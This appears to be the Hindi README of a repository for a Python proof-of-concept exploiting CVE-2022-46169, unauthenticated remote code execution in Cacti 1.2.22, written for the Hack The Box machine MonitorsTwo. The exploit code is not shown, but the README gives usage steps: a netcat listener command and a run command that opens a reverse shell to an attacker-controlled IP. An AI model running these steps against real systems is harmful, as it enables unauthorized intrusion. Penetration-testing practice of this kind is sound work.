
CVE-2022-46169 के लिए Python एक्सप्लॉइट, जो Cacti 1.2.22 पर रिवर्स शेल के माध्यम से अप्रमाणित रिमोट कोड निष्पादन प्रदान करता है, जो शैक्षिक पैठ परीक्षण के लिए अभिप्रेत है।
यह रिपॉजिटरी CVE-2022-46169 के लिए एक एक्सप्लॉइट है, जो Cacti 1.2.22 को प्रभावित करता है। यह कमजोरी एक अप्रमाणित हमलावर को प्रभावित सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देती है।
यदि आप इस एक्सप्लॉइट के संभव होने के बारे में विस्तृत जानकारी चाहते हैं, तो कृपया इस Rapid7 पोस्ट का संदर्भ लें। वे विशिष्टताओं पर विस्तार से चर्चा करते हैं।
मैंने यह कोड chatGPT की मदद से एक Hack The Box मशीन MonitorsTwo के लिए शैक्षिक उद्देश्यों के लिए लिखा है।
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
अपनी स्थानीय मशीन पर netcat के साथ एक लिसनर सेट करें nc -lvnp 9001
लक्ष्य के विरुद्ध एक्सप्लॉइट चलाएँ
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) पूरी तरह से शैक्षिक और परीक्षण उद्देश्यों के लिए है। इस PoC को सिस्टम या नेटवर्क पर सिस्टम स्वामी की स्पष्ट अनुमति के बिना उपयोग करना अवैध है और इससे कानूनी कार्रवाई हो सकती है। निर्माता इस PoC के उचित या अनुचित उपयोग से उत्पन्न किसी भी नुकसान के लिए कोई जिम्मेदारी स्वीकार नहीं करता है। अपने जोखिम पर उपयोग करें।
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/